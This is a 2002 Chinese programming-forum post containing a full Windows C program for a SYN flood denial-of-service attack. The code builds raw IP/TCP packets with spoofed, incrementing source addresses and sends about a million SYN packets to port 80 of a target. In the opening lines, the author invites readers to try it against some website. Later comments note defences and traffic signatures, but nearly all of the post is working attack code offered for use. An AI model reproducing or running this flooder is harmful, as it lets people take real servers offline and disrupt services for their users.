发信人: pzc (呆呆地发呆), 信区: Programming
标 题: SYN Flood
发信站: 哈工大紫丁香 (2002年04月14日11:49:07 星期天), 站内信件
网上很多,见过的都画蛇添足。
改造一个简洁有效的,用某个主页试试便知。
程序仍然可以简化和改造,时间匆忙。
#include "stdafx.h"
#include "winsock2.h"
#include "ws2tcpip.h"
#pragma comment(lib,"ws2_32")
// Base TCP sequence number; the send loop adds a per-packet counter to it.
#define SEQ 0x28376839
// Value stored in the TCP flags byte: 0x02 is the SYN bit, with no other flag set.
#define SYN 0x2
// TCP destination port written into every packet.
#define DEST_PORT 80
// Destination address copied into both the sockaddr and the IP header.
// "x.x.x.x" is the placeholder the author left in the post.
DWORD SYN_DEST_IP = inet_addr("x.x.x.x");
// Base value for the source-address field of the IP header. It is a fixed
// literal, not the sending host's own address, so every packet carries a
// spoofed source.
DWORD FAKE_SRC_IP = inet_addr("111.111.111.111");
// IPv4 header as laid out at the start of the send buffer (no options).
// Field order and widths define the on-wire layout; do not reorder.
typedef struct _iphdr{ // IP header definition
unsigned char h_verlen; // 4-bit header length and 4-bit IP version packed in one byte
unsigned char tos; // type-of-service byte; never assigned below, stays 0 from the zeroed buffer
unsigned short total_len; // total datagram length, stored in network byte order
unsigned short ident; // identification field
unsigned short frag_and_flags; // fragment flags and offset
unsigned char ttl; // time to live (author's note: declaring this as short does not work)
unsigned char proto; // encapsulated protocol number
unsigned short checksum; // IP header checksum field
unsigned int sourceIP; // source address as written by this program
unsigned int destIP; // destination address
}IP_HEADER;
// Fixed-size TCP header (no options) placed directly after IP_HEADER in the
// send buffer. Field order and widths define the on-wire layout.
typedef struct _tcphdr { // TCP header definition
USHORT th_sport; // source port
USHORT th_dpost; // destination port (identifier spelled "dpost" in the original)
unsigned int ht_seq; // sequence number
unsigned int ht_ack; // acknowledgement number
unsigned char th_lenres; // header length in 32-bit words (high nibble) plus reserved bits
unsigned char th_flag; // TCP flag bits
USHORT th_win; // advertised window
USHORT th_sum; // TCP checksum
USHORT th_urp; // urgent pointer
}TCP_HEADER;
// Single global scratch object: the TCP pseudo-header followed by a copy of
// the TCP header, so the checksum can be computed over one contiguous buffer.
struct{ // TCP pseudo-header definition
unsigned long saddr; // source address, copied from the IP header
unsigned long daddr; // destination address, copied from the IP header
char mbz; // must-be-zero byte
char ptcl; // protocol number (set to IPPROTO_TCP by the caller)
unsigned short tcpl; // TCP segment length in network byte order
TCP_HEADER tcp_hdr; // copy of the TCP header being checksummed
}psd_header;
/*
 * Ones'-complement checksum over a byte range, summed as 16-bit words.
 *
 * buffer: start of the data, read one USHORT at a time.
 * size:   length of the data in bytes; a trailing odd byte is added as-is.
 *
 * Returns the bitwise complement of the folded 16-bit sum.
 */
USHORT checksum(USHORT *buffer,int size)
{
    unsigned long acc = 0;
    USHORT *word = buffer;
    int remaining;

    /* Sum every complete 16-bit word. */
    for (remaining = size; remaining > 1; remaining -= 2) {
        acc += *word;
        word++;
    }

    /* Add a single leftover byte, if any. */
    if (remaining != 0) {
        acc += *(UCHAR *)word;
    }

    /* Fold the carries above bit 15 back into the low 16 bits, twice. */
    acc = (acc & 0xffff) + (acc >> 16);
    acc += acc >> 16;

    return (USHORT)~acc;
}
// Builds one 40-byte IPv4 + TCP packet with only the SYN flag set and sends
// it 1024*1024 times through a raw socket with IP_HDRINCL enabled, changing
// the source address and sequence number on each pass.
//
// Returns 0 unconditionally; the results of WSAStartup, WSASocket, setsockopt
// and sendto are never inspected, so the return value says nothing about
// whether any packet left the host.
//
// Why this matters to a defender: the source address written into each header
// is FAKE_SRC_IP plus a counter, never the sender's own address, so the
// receiver's SYN-ACK goes elsewhere and the handshake is left half-open.
// That is the condition SYN cookies, backlog limits and SYN rate limiting
// address on the receiving side, and that source-address ingress filtering
// (BCP 38) addresses at the network edge.
//
// Constant fields visible in the code, usable as a traffic signature:
// source port 7000, window 16384, TTL 128, IP ident value 1, SYN-only flags,
// destination port DEST_PORT, and a sequence number that steps in lockstep
// with the source address over offsets 1..65536.
//
// NOTE(review): Microsoft documents that client Windows releases from XP SP2
// onward restrict TCP sends and forged source addresses on raw sockets; this
// listing dates from 2002 and reflects Winsock behaviour of that time.
int SYN_Flood()
{
int flag=TRUE,SendSEQ=0;
char SendBuf[40]={0};
WSADATA wsaData;
SOCKET SockRaw=(SOCKET)NULL;
struct sockaddr_in DestAddr;
// Both header pointers alias SendBuf: IP header first, TCP header right after.
IP_HEADER * ip_header = (IP_HEADER *) SendBuf;
TCP_HEADER * tcp_header=(TCP_HEADER *)(SendBuf+sizeof(IP_HEADER));
WSAStartup(MAKEWORD(2,1),&wsaData);
SockRaw=WSASocket(AF_INET,SOCK_RAW,IPPROTO_RAW,NULL,0,WSA_FLAG_OVERLAPPED);
// IP_HDRINCL: the caller supplies the IP header, which is what lets the
// program choose the source address itself.
setsockopt(SockRaw,IPPROTO_IP,IP_HDRINCL,(char *)&flag,sizeof(int));
memset(&DestAddr,0,sizeof(DestAddr));
DestAddr.sin_family=AF_INET;
DestAddr.sin_addr.s_addr=SYN_DEST_IP;
// Fill in the IP header
ip_header->h_verlen =(4<<4 | sizeof(IP_HEADER)/sizeof(unsigned long));
// (line above) the high four bits carry the IP version
ip_header->total_len =htons(sizeof(IP_HEADER)+sizeof(TCP_HEADER));
// (line above) 16-bit total length
ip_header->ident =1;
ip_header->frag_and_flags =0;
ip_header->ttl =128;
ip_header->proto =IPPROTO_TCP;
ip_header->checksum =0;
ip_header->sourceIP =FAKE_SRC_IP;
ip_header->destIP = SYN_DEST_IP;
// Fill in the TCP header
tcp_header->th_sport = htons(7000);
tcp_header->th_dpost = htons(DEST_PORT);
tcp_header->ht_seq = htonl(SEQ);
tcp_header->ht_ack = 0;
tcp_header->th_lenres = (sizeof(TCP_HEADER)/4<<4|0);
tcp_header->th_flag = SYN; // SYN flag only
tcp_header->th_win = htons(16384);
tcp_header->th_urp = 0;
tcp_header->th_sum = 0;
// Fill in the TCP pseudo-header
psd_header.saddr = ip_header->sourceIP ;
psd_header.daddr = ip_header->destIP ;
psd_header.mbz = 0;
psd_header.ptcl = IPPROTO_TCP;
psd_header.tcpl = htons(sizeof(TCP_HEADER));
for(int counter=0;counter<1024*1024;counter++)
{
if(SendSEQ++==65536) SendSEQ=1; // author's note: only matters when sending without a bound
// Update the IP header
ip_header->checksum = 0;
ip_header->sourceIP = FAKE_SRC_IP+SendSEQ; // 32-bit source IP: counter added to the raw inet_addr value
// Update the TCP header
tcp_header->ht_seq = htonl(SEQ+SendSEQ); // SYN sequence number
tcp_header->th_sum = 0;
// Update the TCP pseudo-header
psd_header.saddr = ip_header->sourceIP ;
// Compute the TCP checksum; the pseudo-header must be included in the sum
memcpy(&psd_header.tcp_hdr,tcp_header,sizeof(TCP_HEADER));
tcp_header->th_sum = checksum((USHORT*)&psd_header,sizeof(psd_header));
// Send; sizeof(IP_HEADER)+sizeof(TCP_HEADER)=40
sendto(SockRaw,SendBuf,40,0,(struct sockaddr*)&DestAddr,sizeof(DestAddr));
}
closesocket(SockRaw);
WSACleanup();
return 0;
}
/*
 * Program entry point: calls SYN_Flood() once, discards its result, and
 * always exits with status 1.
 */
int main()
{
    (void)SYN_Flood();
    return 1;
}
--
※ 来源:·哈工大紫丁香 bbs.hit.edu.cn·[FROM: 202.118.236.138]
※ 修改:·pzc 於 04月14日11:52:23 修改本文·[FROM: 202.118.236.138]